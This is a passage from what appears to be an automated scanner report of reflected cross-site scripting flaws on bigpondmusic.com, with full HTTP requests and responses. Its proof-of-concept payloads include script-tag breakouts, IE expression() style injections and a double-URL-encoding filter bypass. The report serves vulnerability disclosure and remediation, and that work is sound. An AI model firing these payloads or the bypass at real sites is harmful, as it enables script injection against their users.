p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87831


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains8cf67"><script>alert(1)</script>2659a2ed60e/under5" />
...[SNIP]...

2.184. http://bigpondmusic.com/bargains/under5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 444ae'%3b14886af3365 was submitted in the REST URL parameter 1. This input was echoed as 444ae';14886af3365 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains444ae'%3b14886af3365/under5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains444ae';14886af3365';
   s.prop4 = 'under5';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.185. http://bigpondmusic.com/bargains/under5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 was submitted in the REST URL parameter 2. This input was echoed as 625b9"><script>alert(1)</script>473a7d2f336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under5625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88122


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under5625b9"><script>alert(1)</script>473a7d2f336" />
...[SNIP]...

2.186. http://bigpondmusic.com/bargains/under5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae4bb'%3b381fbba2e70 was submitted in the REST URL parameter 2. This input was echoed as ae4bb';381fbba2e70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under5ae4bb'%3b381fbba2e70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
esting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under5ae4bb';381fbba2e70';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.187. http://bigpondmusic.com/bargains/under5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e23"style%3d"x%3aexpression(alert(1))"359e420ded3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86e23"style="x:expression(alert(1))"359e420ded3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under5?86e23"style%3d"x%3aexpression(alert(1))"359e420ded3=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 195591


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bargain Ep's - BigPond Music
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under5?86e23"style="x:expression(alert(1))"359e420ded3=1" />
...[SNIP]...

2.188. http://bigpondmusic.com/bigpondrecommends [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e was submitted in the REST URL parameter 1. This input was echoed as 2cdfa"><script>alert(1)</script>ec42ffa9a0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bigpondrecommends2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bigpondrecommends2cdfa"><script>alert(1)</script>ec42ffa9a0e" />
...[SNIP]...

2.189. http://bigpondmusic.com/bigpondrecommends [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52be7'%3b8ce78a5cd85 was submitted in the REST URL parameter 1. This input was echoed as 52be7';8ce78a5cd85 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bigpondrecommends52be7'%3b8ce78a5cd85 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
v=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bigpondrecommends52be7';8ce78a5cd85';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.190. http://bigpondmusic.com/bigpondrecommends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e216c"style%3d"x%3aexpression(alert(1))"e688e780f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e216c"style="x:expression(alert(1))"e688e780f68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bigpondrecommends?e216c"style%3d"x%3aexpression(alert(1))"e688e780f68=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154471


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>What are BigPond Music liste
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bigpondrecommends?e216c"style="x:expression(alert(1))"e688e780f68=1" />
...[SNIP]...

2.191. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dc80'%3b9d005988f07 was submitted in the REST URL parameter 1. This input was echoed as 4dc80';9d005988f07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf4dc80'%3b9d005988f07/header/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87944


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf4dc80';9d005988f07';
   s.prop4 = 'header';
   s.prop5 = 'adh.html';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s
...[SNIP]...

2.192. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc31052876 was submitted in the REST URL parameter 1. This input was echoed as 1ed91"><script>alert(1)</script>fc31052876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf1ed91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc31052876/header/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87983


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf1ed91"><script>alert(1)</script>fc31052876/header/adh.html" />
...[SNIP]...

2.193. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea352504a772 was submitted in the REST URL parameter 2. This input was echoed as 664ab"><script>alert(1)</script>a352504a772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/header664ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea352504a772/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88221


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/header664ab"><script>alert(1)</script>a352504a772/adh.html" />
...[SNIP]...

2.194. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c89'%3bfd2f58241 was submitted in the REST URL parameter 2. This input was echoed as e6c89';fd2f58241 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/headere6c89'%3bfd2f58241/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87860


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
st,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'headere6c89';fd2f58241';
   s.prop5 = 'adh.html';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.pro
...[SNIP]...

2.195. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

